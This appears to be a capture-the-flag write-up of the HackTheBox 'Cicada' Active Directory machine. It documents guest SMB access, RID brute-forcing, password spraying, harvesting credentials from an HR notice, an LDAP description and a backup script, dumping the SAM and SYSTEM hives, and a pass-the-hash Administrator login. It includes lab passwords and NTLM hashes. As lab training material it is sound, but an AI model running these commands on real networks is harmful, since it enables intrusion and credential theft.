Cicada - Writeup - Konstantinovitz

## Recon ### [[LDAP - Enumeration|LDAP - Enumeration]] - anonymous bind disallowed ```sh ldapsearch -x -H ldap://$RHOST -s base -b "" "(objectclass=*)" ``` ### [[SMB Enumeration|SMB Enumeration]] - guest login permitted - null session permitted - can read share "HR" ![[Pasted image 20250131151720.png]] **dumping the share:** ``` smbclient //$RHOST/HR -U 'guest' ``` - contains the file "Notice from HR.txt" ``` cat Notice\ from\ HR.txt Dear new hire! Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure. Your default password is: Cicada$M6Corpb*@Lp#nZp!8 To change your password: 1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above. 2. Once logged in, navigate to your account settings or profile settings section. 3. Look for the option to change your password. This will be labeled as "Change Password". 4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters. 5. After changing your password, make sure to save your changes. Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password. If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected]. Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team! Best regards, Cicada Corp ``` so we got a password: `Cicada$M6Corpb*@Lp#nZp!8` ### username enumeration - [x] `rpclient -u $RHOST` - `enumdomusers` - not permitted - [x] common username password spraying - no love - used a custom list and one from seclists - [x] ldap user enum - anonymouns bind not permitted.... - running `kerbrute`: ```shell kerbrute userenum -d cicada.htb --dc $RHOST xato-net-10-million-usernames.txt ``` no love ``` nxc smb $RHOST -u 'guest' -p '' --rid-brute SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest: SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser) ``` we dump these users into a file: ```sh john.smoulder sarah.dantelia michael.wrightson david.orelious emily.oscars ``` we attempt to password spray again: ```sh nxc smb $RHOST -u RID-user-dump.txt -p passwords.txt --continue-on-success ``` ![[Pasted image 20250131163122.png]] and we get: ```michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8``` ## `micahel.wrightson` -> `david.orelious` Now that we've got some credz, I'll do some more authenticated enumeration: ```sh nxc smb $RHOST -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' ``` - can read [[SMB Share - SYSVOL]] - does not seem to be able to [[WinRM - 5986 HTTP]] - can access [[LDAP - Enumeration|LDAP - Enumeration]] ![[Pasted image 20250131164150.png]] - someone conveniently left their password in their Ldap user description <3 - `david.orelious:aRt$Lp#7t*VQ!3` ## `david.orelious`->`emily.oscars` we rinse and repeat the enumeration process for this dude **winrm** ``` nxc winrm $RHOST -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' ``` winrm does not seem permitted. **ldap:** yields the same as previous **another password spray:** yields nada **Checking SMB:** ``` nxc smb $RHOST -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares ``` - can read the `DEV` share - can read `NETLOGON` share? **Dumping the `DEV` share: ** ``` smbclient //$RHOST/DEV -U david.orelious ``` yields `Backup_script.ps1`: ``` $sourceDirectory = "C:\smb" $destinationDirectory = "D:\Backup" $username = "emily.oscars" $password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force $credentials = New-Object System.Management.Automation.PSCredential($username, $password) $dateStamp = Get-Date -Format "yyyyMMdd_HHmmss" $backupFileName = "smb_backup_$dateStamp.zip" $backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath" ``` we got another set of credentials: `emily.oscars:Q!3@Lp#M6b*7t*Vt` ## `emily.oscars`->`Administrator` ### SMB - can READ [[SMB Share - ADMIN$]] - indicating this lady is in the `Administrators` group - can `READ,WRITE` on `C

share ### [[WinRM - 5986 HTTP]] - can authenticate using [[Evil-WinRM]] - we're in bby ### Local Access **Some manual enumeration:** ```sh whoami /groups # get all domain users net user /domain Get-ADUser -Filter * | Select Name,SamAccountName # get admin users Get-ADUser -Filter {AdminCount -eq 1} -Properties * | Select Name,SamAccountName,MemberOf ``` reveals we already be them admin group as well as [[AD Group - Backup Operator]] backup operators. We use the following commands to dump the `SAM` and `SYSTEM` hives: ``` reg save hklm\sam c:\windows\tasks\SAM reg save hklm\system c:\windows\tasks\SYSTEM ``` then we use [[Evil-WinRM]]'s built-in download functionality to save them to our local system. we proceed to use [[Methodology/0 - Infrastructure/noctua/Arsenal/lateral_movement/Impacket|Impacket]]'s `secretsdump.py` to dump the SAM database which yields local **NTLM hashes** for users on the system: ```sh secretsdump.py -sam SAM -system SYSTEM LOCAL Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Cleaning up... ``` lastly we utilize the recently dumped hash for the `Administrator` account to gain remote access through [[Evil-WinRM]]: ``` evil-winrm -i $RHOST -u 'Administrator' -H 2b87e7c93a3e8a0ea4a581937016f341 ```